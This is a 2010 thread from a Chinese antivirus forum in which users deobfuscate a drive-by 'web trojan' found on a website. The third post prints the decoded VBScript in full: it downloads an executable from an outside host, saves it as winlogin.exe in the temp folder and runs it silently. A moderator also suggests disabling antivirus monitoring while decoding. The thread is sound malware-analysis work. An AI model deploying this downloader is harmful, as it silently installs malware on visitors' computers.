http://www.nc-ndt.com/gs/system.htm - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流 http://www.nc-ndt.com/gs/system.htm

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[求助] http://www.nc-ndt.com/gs/system.htm

带脚镣跳舞初生襁褓狮帖子:13 注册: 2010-01-05 来自:	发表于： 2010-01-06 15:11 \| 只看楼主短消息资料字号：小中大 1楼 http://www.nc-ndt.com/gs/system.htm 在freshow中，解密该网马，杀毒软件提示脚本病毒，无法连接成功，有没有其他办法可以解密 1.jpg (52.84 K) 2010-1-6 15:11:23 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; CIBA; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
带脚镣跳舞初生襁褓狮帖子:13 注册: 2010-01-05 来自:	分享到：

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2010-01-06 15:14 \| 短消息资料字号：小中大 2楼回复 1F 带脚镣跳舞的帖子解密时建议暂时关闭安全类软件监控，一般情况下不会导致系统中毒，如不放心可在虚拟机下进行解密。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

带脚镣跳舞初生襁褓狮帖子:13 注册: 2010-01-05 来自:	发表于： 2010-01-06 15:24 \| 只看楼主短消息资料字号：小中大 3楼回复：http://www.nc-ndt.com/gs/system.htm <SCRIPT>var Words="<html> <script language="VBScript"> on error resume next dl = "http://www.zzjsxy.com/al\system.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="winlogin.exe" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> <head> <title>system</title> </head><body> <center></center> </body></html> ";document.write(unescape(Words))</SCRIPT> http://www.nc-ndt.com/index.asp<script language="javascript" src="http://wswmxz.vicp.net/index.htm"></script> 经过解密后是这样的结果官方给出的结果是http://www.zzjsxy.com/alsystem.exe 但是代码中有个src以及al\system.exe 请斑竹解惑 networkedition 最后编辑于 2010-01-06 15:28:24
带脚镣跳舞初生襁褓狮帖子:13 注册: 2010-01-05 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2010-01-06 15:31 \| 短消息资料字号：小中大 4楼回复：http://www.nc-ndt.com/gs/system.htm http://www.zzjsxy.com/al\system.exe 是这个，把斜杠修改一下 http://www.zzjsxy.com/al/system.exe
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT